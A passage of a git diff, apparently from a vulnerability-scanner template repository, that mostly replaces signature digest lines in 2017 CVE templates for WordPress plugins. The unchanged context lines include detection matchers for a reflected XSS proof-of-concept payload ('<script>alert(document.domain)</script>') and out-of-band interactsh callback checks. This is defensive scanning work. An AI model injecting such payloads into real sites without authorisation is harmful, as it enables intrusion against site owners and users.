4a0a00473045022100ad66c367e331e508a9f4b8fa4a02f983e9f099aeadd13065ad5c5afce55ef49c022066cea12a22089ef4211b14cd43c45a6ee5a3d7ba24ae488ba1f0f9d108f68fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8ad1f8a03b92de7bc6cebf760d69d12729198d8fcbfa54e5e09cd9e4cfe1aba022100bc14286072cd2f87dad9e6d870daeac4050ae6d77f50a967de331b947f904ecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 14024f2780..4e6e16b60b 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e15727b0ddf652065861bf22bea1c0e93ae8134932a63f1691a2256adbd1b25602201f24ab36ca2f64094ec81fa3f92890da072058fd9f23c5802569ecd06afcb00c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf464ae1865ebdfc07eca5805af2e4ef8b10d1f7751f62adb5de2c0c9476687602207e8e107717c8972c0c2a91ccf68984488b5bf04de54c3e3bdfd1598beacbf8af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index dca5028bfe..c57bb085a4 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google AdSense")' condition: and -# digest: 4a0a00473045022100ac224191317b7f9d5c8305933b2f932fc9c11bbb1d356f807a34412326386f6002201ffc830ad1f53205651cbf36c8e55b45f44beea9ded57833044904fb6736187e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2f144543f909a5615a872d0bd6f175f8d7481b76040c77d249082c14cdd77b5022100a45e78dd4bacbe1a90ff470b53c32cb5747094df301236a60c0aa95bbbb15a3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index 66e01c1136..fe6fceb759 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 490a00463044022047a86d472b4963557d6bdde6b11f2b646e6313f13a90a273e1fce430e894092102205e15a23b0220c1cbb8df6bccb36fd1346acd96b67121cd1349c4c4016415f034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220309d50219f298d7eea07a19c9191ff46c8a45c69b74b58d89a0ad909e927783f022057edf5a64e245323e5dd0e27cbc7b15cc446f824ab7fc1cd11d7ccf9bd8c0a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 964c52810f..647c706979 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form by")' condition: and -# digest: 490a00463044022022aaa77f0654980937b928d490f572e59c3e40755b874d4e7ff6a7168136202b02203fcd59db42dff8780151fd38459c2b921a77502f91ff4c72364ad218117af4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205922464cb9b082012a5717f6ae4a5c781c09d72276c4a13f00c395e2341c4940022100c3b722a4063eb9e67e300cbbc803ae02cdfd639fc0a887d6ed676e3a54f6ed23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index bcc3055173..0e3351d0c6 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 4a0a004730450221009117b9d4328ea3a5d94d9ecd68c3c1402e95a82c3b7f5946adaf2c0210a7dd9302203ec8c8a43e1798ce9f668234b12d6d47f7b08c68abd2f858016c8b168794db62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6bb8513bced954e51008a530b0724db84f61bb3f0b140ea5002a674017aca9002204ee548db86017b15989be9df5eb8e52e0e4f1a68864352638af2ad67bcc245c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index b3f94004bc..19c0261467 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 4b0a00483046022100a8f985f73aa53f158d7b69dc00405ae8393492e82583cda9393d45d6e09b86df022100f47e60f2df1bbdfee0a7a9497bda25b96739c2c69f49f2d8b587082bc45df3b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6fe80f9f7d1aab556e1036f8defebeba6ea11c63f16d34b04afe90e95f4546202200808bf2577b4a08b4780aadbaa4011e1d3f8550e44937ddcb47fe5b3d221cb83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 3ca18d781a..6efe86ae09 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Custom Search by")' condition: and -# digest: 4b0a00483046022100f9cc3cc8539a1d411d5a0fc2255808c1742059f86723ee77d65a025201fb801e022100d596c70a28642269afc2cafe1fecf0ff789694b8d7407ac813fd2a6adb176d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206317d36f774a6e18918ff1f1e37f50249a0ce640d5a5516998ede088be17bb1a022100f0d31a71b6bc8cf142d888decd4c4a769997873f78303ea4b9a06ea6be1581e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index c4586cd270..6b6cb879c5 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Htaccess by")' condition: and -# digest: 4b0a0048304602210083bbc08d8af961271e098a1736c206c3ef81fc9a67b9886fc1185988a4a8d5310221008313ab9d0915cea1add617dcb62ca6f423209ab3d00216d25b0440fe803c5b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d15d88b20dc2025c1222de29bcdcb7f8e8d30287102244dd47259b4709bdd539022074e861018f6c2c65de07cd24dab9c02ffea05aec9e96e88314e17857f73270eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index cc7a41659f..47d08c7d21 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 4a0a00473045022100f89fb19d15fb08118427dcbbec861334e2869b19a7f7629f950880a2b1a030a402204c072011a5c2993febfb3b7ebae8ee5904fd3f1ab56497f1dbfcdc2b0383083d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e023710fd2cddcb7031ad7fba8662510eaeed9e5faafbd42d85dd970f2d8ee0202202366661999f0a17500a912412bd4d032a998c89376f68bf9607137adec9e75e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index faa0193501..7af4ac0a0d 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Social Login by")' condition: and -# digest: 4a0a00473045022100afda914e7e9726b246e585b8f4faa2ff861c17837ff01ded7c22cbaf1e4ea39e02205a4ecb7f7af6fbd5809cb254f685cee642439232493671b38962a87dfed0b84e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b926cdd9c0ccc5dd9db56d2d1011d94f6bcb665e4215f9b90fc954268a35f671022100fa7f0cc871a66086020b70e8d3c2f1f862fe6497f6174e0101aa0c4c9b9bedd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index a2da2b6576..702e3f5399 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Subscriber by")' condition: and -# digest: 4a0a0047304502210092c0a8a182713b0379f504577e9c0a88d2b686eb80d7625f27f9f20fc3442e0002207e24abadc4512d14c9a97c97f04f2c3ddf76f1344b4e8a945a2d00c0732a9410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206e4b864003dd64c21ddbc07de1eae42df292cce45d23b04ff0a705050c7d6fee022069151f539cdd3d0ffcc2d3de11e35b01a3f9d076a033bc2f9506cedef12a0431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index cea2025592..58b79a5aef 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 4b0a00483046022100a1c5828cf67da18081cde718eb3df76029916bef83ff06ee5d51264e37751dc10221008c464e7a9ae6f75aabb858462c3a0fd473bfcf2e3940b8611d895617e2fb7d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022100dcf0b1872f1e4b503b0af45ff58d2dd2d63f7c318e856f62fa9e9e737b583dcc021f756676a67d113a71da4ccd4e3136fc5299b660be6ff05f647b675444fe0f9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index b060708a0b..3a88b0d928 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and -# digest: 4a0a00473045022100a4098e76f7a55d8322e7d021a7eb38813ded4ec6d28cf311172d96b63872272c02204aa37545bb0e8ebbd130f622c72698d7d0305c164a9e707c1c013d6bd1b2e961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029e324ae86078771f7966a269328bfcbcbe6936a0ea4be26a3aa7d464e03985102206feb41aa4ca49f348a755fb8128515520fe3d45f4979f4fb8bf5ce642b8039a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index 5e719cd684..e73fe4cd1a 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and -# digest: 4a0a00473045022100af2908669633025e0cd2c10a956572c409d05f08269b1acfc20d5f65a54c42a5022059f147b57251e197a65aa9d400012d989a43c66fa4416c1eb7ee9de23ffd4eb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f42861bb6943a4d15b0b1d3395e4e7bd35611f410bbe8966b3fbcc368a0981b1022100e9ae78c33f21aa32aef0a555d60f034ddaa95205574bcbdd225cdfa87253bd89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index b4d57d72e3..460fc36583 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 4b0a00483046022100ca4f19febda81cd89ac62f3d319631ca3ba438d5c136b4119a5b590e76b81eb4022100c2f1c4f238b7b72d78dbdcfb3579a60e7abd1c1f1e92f5767756df9efdf59ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ea1156bb7aca36c6c5f6c4b32a5da0dd2a371d79ef01efc1f617333ca8ea40102200af36b5bdce7f177e9470a66b8d7efc415ba18d72c902af7e624a870db782b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index 74055e74f8..f21ed85a11 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and -# digest: 4a0a0047304502207cd86a94cd8aead4a49bbda3b690bb04c0f1febccfb6785b34b253cbab353f48022100e56e0a7397f05b7b5e043e8bf763fbcaf8ea0f17ab29aeecdf9fe91979b4c422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c217cf6634e20882d3d3c5617089a1d6c93945b233f5793c195bb2d7efcdcb2b0221008e821f6cbd160c00a7f0cf3c32fbd0668e25537e0400c293d97280ef0bbd9585:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index 3a88acbb5a..fa245ea667 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 4a0a00473045022100bbd7d8507fd10adffb260fac65763dd3af0450f57124c9588276e948193a1f4a02205120b25ba77cad36eec889f71816330835a4b76d3e08924a6bfea9d372b399f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f2fb28a6fe0f4e727facb4c87f8183d1c05d941bc0c2f181108a7196c99f7850220083b85ba8d55c0817511ea3f1ed08a03e9f474c8c0849d351db0352bb7d98241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 34a0ccab1b..bdf1d39088 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a00473045022100c33283fd423db70d402c7fd047dc7bebc3eec4bff361ff9d59d4b1efbf225c3d0220245cae47085cf15e815dc7d291310b1550e49f9eef084e23e11863a4392656f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dce2ddd796dc445298de0b036569d53a793dc981ca120153d192393eb4138b91022040b10fd80423f88a9e0bcfe1ba0dbb1621e43a2d2125149840e3524072ed75db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index b251907434..2986dfffc1 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and -# digest: 490a004630440220217ca670c25fd088273af9e902e6a30cf2ca9fa7555a0a0ad608454e147ef75c0220668e31fc705d4ceea309b1449b1311d65e0d07f98813067bb6205352b6e9985d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d14387bb807d60d92965e154331ac1f4dcf45276ab31045f5fa4aff1a4ad56f502205ec3a2018588e6e9fd95843db0d597aefa6494fcb532e57cf85856ad6081046f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index e3e4a1947e..19cb52f5d5 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 4a0a004730450220370407ad931bf1c297e16c99d3c5c1ca953628677fc94ea86715e3131e2b0233022100f740ab11752605c7ddc1fe1f1c1724858aad10d2b52e78f1f9f4a416290da561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055f7184ddba40ff8bc048f5fde8113756fd30099586ffa5b9de186dd6a8498e20221008eff9c034c2b21f9f1086faaa85dfa1e220a4f802f772f45005325021daa14a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index c491888c89..a44a70c343 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ef531d92525eaf4b6152954eebea1e6c23d7c515afce012b6c1223079ec3ad9002210086b9a6f9ffefa3c35ec6bbe9ee00c650696dced3b57ab09fe2c93ebc05d0a5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210095f1b8849e5c8ac04f646439eb2eb865483f6432fa2bb914e0942004393ffccc022100907a8ec81a4e92bfcf8c949f7d9e3853dc3033e1321a8ed4015f8aef930822e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index bf1d5a78ec..5c68ef701c 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 4b0a00483046022100f6694c2351da20106780916ead57acded8b3561215bff593cfc360a10dedda34022100c75806459a4114b92d8648e825188a9cbc42ba259aa226de782c73040b0007dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1b8b53832c640443927a239b59a693a670b9bfc237cb699ba61b223cb8a652c022041096691678b98e9fcdf56d6d8535bb66cb180a08e91b26c5b46c3f4ce771c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index bb4ae4564f..0182d593bc 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 4a0a0047304502200f7aefa84c2f74418d8bfda7eaebb599348ddbbfb4c230fcfc56a9b82ccc1b3d022100eeaecc0e672ed38b43954db6259d083cd20eb2535283ec8ac0e9154f6d71d649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a642d73b44074f3bbdf0efaccd2848c1c08663433c85afb0b7c479451a28fc9402210099b949219f2bc734a1a37836c79d73c465a52c7d36281dc1509ff0731b6fe843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 8cb0b0a3a0..417feb4dca 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and -# digest: 4a0a00473045022058df345caa79fcc85007be091f7b75d399b7d9f2502995f539f1e3387b69d9e7022100d5f4cc931077b75d81472cc62173979120b245394f458e0e02215ea798ce26bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe01c932c0e4cb28aaa09be35931901def6da9156423788f1273ce95ec25383e022100881310859f0fe8598816e9dd175b53807394c4e2606f0e34eaa6a4520c858649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 2243806246..1e38c2e008 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and -# digest: 490a0046304402202f2ce883ac28fa110099e93debcea93ba72a87c644e7d50eab47ba65b5b0c0010220263c16a96c6d3ee59ee4639403d581676533664e25e9d12ddafed64e9f58a560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed1b6c5d04f21c78e943b4993d472189e36df1733dc10800b62deca1bc6c18d2022014f77ec4de6a90b2c095c1dbdc5bb61e93e03eb6f5f3ecd1ec60f9703ee2e024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index c4889c31ea..fbd0973fd6 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 4a0a004730450221008db3605db8249b8d03ef76b687a919f1586b95a60fd71fb15afb8cc74ba152130220371bf249484018debba5b816e27dcf3f7d8fdd724c87788635a6136b1266ef07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b857ebe6869ee45f7dc4cff92ae7682a95b98286296b23281f2dfbdf01999732022100f8f5b927297f1d44346317dcd9659352a25a45199675628023f765a3d6a6cc22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index 7e99d9c7c3..8b35ceb57f 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and -# digest: 490a0046304402204ffa643dfec6a2a1304afeb8c507e527816e6ffdbf5bf55d1f78ce117196956c022062d2904783e48e1571ddcd034438544bd6ef716a64604b5cd204c9e6d93f17fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd3c538f6d53984acdce0e66fef97e1081a643dbb6921d756ebc88c5d4d2a65c022100ca84221f6ec3d788ebc71c032d4ece39ecca89429e9630d41c52dd3f169021c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index d40c5f2e22..519180be8c 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 490a0046304402206bf5a1ea4bf5034892e440458b150b6df66ff63e42a5677e30878b7d4b43d34102205868e55cb82cdee0363c36f0da53f76767397ddc734f06b2df94b8835493bbe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c10e42cf8c927b6c89715593cbc44a0eb7d70415e077c7cefc813541abfac28022100f611a234592239a4f01327dce894478ed0b4fba7ad216909b3e8166758c90381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index d32fcceffd..d7dbdba507 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4a0a00473045022100a044599dd64fbe525d5491598bb2bd08fb20f3b1246daa85cf894198d9a4b72a02202c881e075c5cf297c2153729f9a3bca4925a615334a49850ca79a635c41b5efb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f088907da44a2cfd70389dfaf174e89311d92a1172ac70a3c54dc21e056b198602205c275024f4e29ef71f7a5391b3e006873b4244b1eed2b06005d39186225cb401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 4a20213479..806074a32d 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and -# digest: 490a0046304402200d379d9480f868260b65e821ad630ab781d2dd52c2f0e25e667b41cf3bf9c7cb022068938f861976e3222cbe26a54ec296eef974f942967912acb942edb9a52d2f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100adad73e4ddbb122f6a74cd2eabb9fdba00f971d35e4fe0f330cd9489c8a85c220220035d45b55c8be488ed39701890033e2b69d9920dfcb71614149d760df5788bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 65c8cabca4..60c4d50b3c 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -58,4 +58,4 @@ http: part: body words: - "console.log" -# digest: 4b0a00483046022100a1ebb8975874781de2f146909353d3cb9d51b05b60508558c7d599376c062441022100c9a14b006fb26874b9b2f075e436d6c4ca526fe128d549c7c9a7fd5ed7c35cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051e9027e449edff73649c81fe3cdba7ea4987a418a629a8b42e46524a18db753022100fcab7edcab8e705beea02220885aaa95c1084399834295982ccc23d902f9795e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 4c6c339c2d..6f0e8b5a88 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -40,4 +40,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4b0a00483046022100a2ead70694f8fbe9b3e3642b2ba252925a11e895d24c116c6fcf822fec79ffc3022100cb724ed9183a630d2b16eb3ad1ea4e8dd9589e0005873b67061634479dbe51eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d29fdd415b29112463f116a395e27d57520ac8863b59435c3ab3bd8c9de579b2022100b98beb232332f6eb2c320dcb65057b007073e7c8ea50fd433ac91e2a9e86355a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 586de89eea..9c37ceeee1 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -61,4 +61,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 